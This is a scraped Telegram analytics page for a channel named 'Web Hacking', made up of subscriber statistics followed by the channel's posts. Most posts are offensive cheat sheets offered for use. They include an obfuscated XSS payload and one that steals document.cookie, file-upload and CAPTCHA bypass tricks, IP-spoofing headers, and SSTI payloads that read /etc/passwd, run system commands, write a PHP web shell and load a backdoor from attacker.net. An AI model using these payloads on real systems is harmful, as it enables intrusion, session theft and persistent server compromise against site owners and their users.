Web Hacking
رفتن به کانال در Telegram
2 028
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
+1830 روز
در حال بارگیری داده...
کانالهای مشابه
هیچ دادهای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
ابر برچسبها
هیچ دادهای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
اوت '24
اوت '24
+49
در 0 کانالها
ژوئیه '24
+95
در 0 کانالها
Get PRO
ژوئن '24
+87
در 0 کانالها
Get PRO
مه '24
+127
در 1 کانالها
Get PRO
آوریل '24
+96
در 1 کانالها
Get PRO
مارس '24
+52
در 0 کانالها
Get PRO
فوریه '24
+49
در 0 کانالها
Get PRO
ژانویه '24
+50
در 0 کانالها
Get PRO
دسامبر '23
+75
در 0 کانالها
Get PRO
نوامبر '23
+80
در 0 کانالها
Get PRO
اکتبر '23
+78
در 0 کانالها
Get PRO
سپتامبر '23
+66
در 0 کانالها
Get PRO
اوت '23
+69
در 0 کانالها
Get PRO
ژوئیه '23
+95
در 0 کانالها
Get PRO
ژوئن '23
+50
در 0 کانالها
Get PRO
مه '23
+69
در 0 کانالها
Get PRO
آوریل '23
+69
در 0 کانالها
Get PRO
مارس '23
+75
در 0 کانالها
Get PRO
فوریه '23
+76
در 0 کانالها
Get PRO
ژانویه '23
+92
در 0 کانالها
Get PRO
دسامبر '22
+64
در 0 کانالها
Get PRO
نوامبر '22
+103
در 0 کانالها
Get PRO
اکتبر '22
+89
در 0 کانالها
Get PRO
سپتامبر '22
+115
در 0 کانالها
Get PRO
اوت '22
+72
در 0 کانالها
Get PRO
ژوئیه '22
+119
در 0 کانالها
Get PRO
ژوئن '22
+30
در 0 کانالها
Get PRO
مه '22
+24
در 0 کانالها
Get PRO
آوریل '22
+37
در 0 کانالها
Get PRO
مارس '220
در 0 کانالها
Get PRO
فوریه '220
در 0 کانالها
Get PRO
ژانویه '220
در 0 کانالها
Get PRO
دسامبر '21
+8
در 0 کانالها
Get PRO
نوامبر '21
+28
در 0 کانالها
Get PRO
اکتبر '21
+23
در 0 کانالها
Get PRO
سپتامبر '21
+45
در 0 کانالها
Get PRO
اوت '21
+36
در 0 کانالها
Get PRO
ژوئیه '21
+27
در 0 کانالها
Get PRO
ژوئن '21
+27
در 0 کانالها
Get PRO
مه '21
+31
در 0 کانالها
Get PRO
آوریل '21
+43
در 0 کانالها
Get PRO
مارس '21
+33
در 0 کانالها
Get PRO
فوریه '21
+51
در 0 کانالها
Get PRO
ژانویه '21
+38
در 0 کانالها
Get PRO
دسامبر '20
+382
در 0 کانالها
| تاریخ | رشد مشترکین | اشارات | کانالها | |
| 21 اوت | +2 | |||
| 20 اوت | +5 | |||
| 19 اوت | +1 | |||
| 18 اوت | +2 | |||
| 17 اوت | +2 | |||
| 16 اوت | +1 | |||
| 15 اوت | 0 | |||
| 14 اوت | +3 | |||
| 13 اوت | +5 | |||
| 12 اوت | +3 | |||
| 11 اوت | +3 | |||
| 10 اوت | +3 | |||
| 09 اوت | +1 | |||
| 08 اوت | +2 | |||
| 07 اوت | +1 | |||
| 06 اوت | +1 | |||
| 05 اوت | +1 | |||
| 04 اوت | +2 | |||
| 03 اوت | 0 | |||
| 02 اوت | +6 | |||
| 01 اوت | +5 |
('%00tst@tst.com.br #XSS #Pay…","articleBody":"Payload XSS on login page:\n\n');\\\\('%00tst@tst.com.br\n\n#XSS #Payload","datePublished":"2023-12-30T11:52:15Z","dateModified":"2023-12-30T11:52:47Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2023-12-30T11:51:53Z"}}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/133","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/133","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/133","headline":"https://t.me/PythonForCyberSecurity","articleBody":"https://t.me/PythonForCyberSecurity","datePublished":"2023-12-26T03:38:30Z","dateModified":"2023-12-26T03:38:30Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1112},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/132","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/132","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/132","headline":"Bug bounty Cheatsheet: For more like this, join us at: t.me/OSCP_training XSS https://github.com/EdOverflow/b…","articleBody":"Bug bounty Cheatsheet:\n\nFor more like this, join us at:\nt.me/OSCP_training\n\nXSS\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md\nhttps://github.com/ismailtasdelen/xss-payload-list\n\nSQLi\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md\n\nSSRF\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery\n\nCRLF\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection\n\nCSV-Injection\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection\n\nCommand Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection\n\nDirectory Traversal\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal\n\nLFI\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion\n\nXXE\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md\n\nOpen-Redirect\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md\n\nRCE\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md\n\nCrypto\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md\n\nTemplate Injection\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\n\nXSLT\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md\n\nContent Injection\nhttps://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md\n\nLDAP Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection\n\nNoSQL Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection\n\nCSRF Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection\n\nGraphQL Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection\n\nIDOR\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References\n\nISCM\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management\n\nLaTex Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection\n\nOAuth \nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth\n\nXPATH Injection\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection\n\nBypass Upload Tricky\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files","datePublished":"2023-12-25T19:48:30Z","dateModified":"2023-12-25T19:48:30Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":817},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":33}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2023-12-25T19:47:45Z"}}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/131","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/131","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/131","headline":"GitHub - rodolfomarianocy/OSCP-Tricks-2023: OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercis…","articleBody":"GitHub - rodolfomarianocy/OSCP-Tricks-2023: OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercises, Machines\nhttps://github.com/rodolfomarianocy/OSCP-Tricks-2023","datePublished":"2023-12-21T17:24:15Z","dateModified":"2023-12-21T17:24:15Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":696},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":7}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2023-12-21T15:45:55Z"}}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/130","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/130","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/130","headline":"Cross-Site Request Forgery https://www.saygili.org/2020/11/cross-site-request-forgery.html","articleBody":"Cross-Site Request Forgery\nhttps://www.saygili.org/2020/11/cross-site-request-forgery.html","datePublished":"2023-12-18T21:05:52Z","dateModified":"2023-12-18T21:05:52Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":889},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":4}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/129","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/129","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/129","headline":"HTTP Host Header Attack https://www.saygili.org/2020/11/http-host-header-attack.html","articleBody":"HTTP Host Header Attack\nhttps://www.saygili.org/2020/11/http-host-header-attack.html","datePublished":"2023-12-14T18:48:50Z","dateModified":"2023-12-14T18:48:50Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":937},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":5}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/128","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/128","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/128","headline":"WhatsApp'ta Cyber Security kanalını takip edin: https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q","articleBody":"WhatsApp'ta Cyber Security kanalını takip edin: https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q","datePublished":"2023-10-28T08:43:51Z","dateModified":"2023-10-28T08:43:51Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":354},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2023-10-28T08:43:14Z"}}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/127","url":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/127","mainEntityOfPage":"https://telemetr.io/fa/channels/1159727667-webhacking/posts/127","headline":"https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q","articleBody":"https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q","datePublished":"2023-10-08T17:13:20Z","dateModified":"2023-10-08T17:13:20Z","author":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"publisher":{"@type":"Organization","name":"Web Hacking","url":"https://telemetr.io/fa/channels/1159727667-webhacking","image":"https://img.tlmtr.io/c/1gu68X/5852683288253150509?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":549}]}}]}
پستهای کانال
| 2 | a XSS payload, Cuneiform-alphabet based ! 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() | 1 |
| 3 | File Upload Bypass -
Blacklisting Bypass
PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr
Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg | 4 932 |
| 4 | Rate Limit Bypass Techniques:
Adding HTTP Headers to Spoof IP and Evade Detection:
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Host: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1 | 699 |
| 5 | SSTI (Server Side Template Injection)
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}} | 4 041 |
| 6 | Google Dorks to Find Sensitive data or dir | 3 132 |
| 7 | APIs Fuzzing for Bug Bounty.pdf | 708 |
| 8 | CAPTCHA Bypass
* Send old captcha value.
* Send old captcha value with old session ID.
* Remove captcha with any adblocker and request again
* Bypass with OCR
* Response manipulation.
* Use any token with the same length(+1/-1).
* Remove the param value or remove the entire parameter.
* Change the method from POST to GET(or PUT) and remove the captcha.
* Change body to JSON or vice-versa.
* Check whether the value of the captcha is in the source code.
* Add headers:
X-Forwarded-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1 | 570 |
| 9 | Tryhackme.pdf | 564 |
| 10 | Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg> | 747 |
| 11 | بدون متن... | 749 |
| 12 | WhatsApp'ta OSCP Training kanalını takip edin: https://whatsapp.com/channel/0029VaDxObG17EmxK6bvmy3a | 961 |
| 13 | Payload XSS on login page:
');\\</script><script>alert(document.cookie)</script>('%00tst@tst.com.br
#XSS #Payload | 1 |
| 14 | https://t.me/PythonForCyberSecurity | 1 112 |
| 15 | Bug bounty Cheatsheet:
For more like this, join us at:
t.me/OSCP_training
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
SSRF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
CRLF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
CSV-Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection
Command Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Directory Traversal
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
LFI
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
XXE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md
Open-Redirect
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md
RCE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md
Crypto
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md
Template Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
XSLT
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md
Content Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md
LDAP Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
NoSQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
CSRF Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection
GraphQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
IDOR
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References
ISCM
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management
LaTex Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
OAuth
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth
XPATH Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
Bypass Upload Tricky
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files | 817 |
| 16 | GitHub - rodolfomarianocy/OSCP-Tricks-2023: OSCP 2023 Preparation Guide | Courses, Tricks, Tutorials, Exercises, Machines
https://github.com/rodolfomarianocy/OSCP-Tricks-2023 | 696 |
| 17 | Cross-Site Request Forgery
https://www.saygili.org/2020/11/cross-site-request-forgery.html | 889 |
| 18 | HTTP Host Header Attack
https://www.saygili.org/2020/11/http-host-header-attack.html | 937 |
| 19 | WhatsApp'ta Cyber Security kanalını takip edin: https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q | 354 |
| 20 | https://whatsapp.com/channel/0029Va6CNA2HFxP702cjaC3q | 549 |
